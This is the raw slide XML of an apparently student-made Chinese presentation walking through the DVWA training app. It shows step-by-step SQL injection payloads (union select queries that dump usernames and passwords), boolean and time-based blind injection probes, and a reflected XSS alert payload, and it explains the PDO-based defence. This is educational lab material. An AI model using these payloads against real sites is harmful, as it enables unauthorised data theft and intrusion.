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76" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259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77" r:id="rId21"/>
    <p:sldId id="267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4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7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55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9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BFC6-CE93-464C-852E-9E4D0ED4542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BB513C-F018-456A-9587-1AC024B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3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zhidao.baidu.com/question/545798105.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freebuf.com/author/loneh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uriteam.com/securityreviews/5DP0N1P76E.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freebuf.com/sectool/102661.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dvwa.co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831" y="1239981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登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>界面及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 smtClean="0"/>
              <a:t>计算机学院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16030130096</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>田</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>宝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0"/>
              <a:t>林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341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32854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SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（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b="1" dirty="0" smtClean="0"/>
              <a:t>目标：获得用户的登录信息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判断是否存在注入，注入是字符型还是数字型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>steps: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/>
              <a:t>1' and '1' = '2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询失败，返回结果为空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/>
              <a:t>1' or '1234 '='1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询成功：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结论：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回了多个结果，说明存在字符型注入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猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>查询语句中的字段数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28800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>steps: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1′ or 1=1 order by 1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，查询成功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1′ or 1=1 order by 2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，查询成功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1′ or 1=1 order by 3 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，查询失败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89212" y="3962400"/>
            <a:ext cx="8915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1' union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1,2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>猜测字段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(union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的解释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当前数据库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1′ union select 1,database() #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，查询成功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结论：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>说明当前的数据库为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa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59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b="1" dirty="0"/>
              <a:t>获取数据库中的表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/>
              <a:t>1' union select 1,group_concat(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=database() # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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结论：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>说明数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中一共有两个表，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>guestbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users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07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b="1" dirty="0"/>
              <a:t>获取表中的字段名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/>
              <a:t>1' union select 1,group_concat(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 'users' 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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结论：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字段，分别是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>user_id,first_name,last_name,user,password,avatar,last_login,failed_login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23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b="1" dirty="0"/>
              <a:t>下载数据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/>
              <a:t>1' or 1=1 union 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user_id,first_name,last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(password) from users # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询成功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结论：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样就得到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>user_id,first_name,last_name,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3370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Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>级别的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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级别的代码利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数对特殊符号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\x00,\n,\r,\,’,”,\x1a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行转义，同时前端页面设置了下拉选择表单，希望以此来控制用户的输入。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虽然前端使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>下拉选择菜单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但我们依然可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>抓包改参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，提交恶意构造的查询参数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需要用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>抓包软件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4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>级别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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可以看到，与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级别的代码相比，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级别的只是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询语句中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>添加了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 1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希望</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以此控制只输出一个结果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虽然添加了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LIMIT 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但是我们可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将其注释掉。由于手工注入的过程与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级别基本一样，直接最后一步演示下载数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 1=1 union 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user_id,first_name,last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(password) from users #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，查询成功：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4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Impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>级别的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>注入攻击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防范的方面：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以看到，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>级别的代码采用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PDO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>划清了代码与数据的界限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，有效防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入。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同时只有返回的查询结果数量为一时，才会成功输出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Anti-CSRF token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>机制的加入了进一步提高了安全性。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32758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Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注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en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>判断是否存在注入，注入是字符型还是数字型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，显示相应用户存在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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and 1=1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，显示存在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/>
              <a:t>1' and 1=2 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示不存在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sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>结论：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>说明存在字符型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盲注。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5343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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t>登录界面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框架</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean="0"/>
          </a:p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代码讲解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92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基于时间的盲注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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>' and sleep(5) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>感觉到明显延迟；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1 and sleep(5) #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，没有延迟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结论：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的基于时间的盲注。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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（反射型跨站脚本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语言的嵌套：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&lt;script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>("XSS");&lt;/script&gt;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88655"/>
            <a:ext cx="8915400" cy="43225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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>[1] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>讲解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>]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www.freebuf.com/author/lonehand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[2] [</a:t>
            </a:r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php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文档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]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.php.net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1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>[3] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>官网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r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://www.dvwa.co.uk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1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>[4] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>环境安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r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www.freebuf.com/sectool/102661.html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1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>[5] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>注入攻击详解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r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www.securiteam.com/securityreviews/5DP0N1P76E.html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1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>[6] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>的用法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p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zhidao.baidu.com/question/545798105.html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8850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Brute Force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（暴力（破解））</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（命令行注入）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（跨站请求伪造）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（文件包含）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>File Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（文件上传）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Insecure CAPTCHA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（不安全的验证码）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
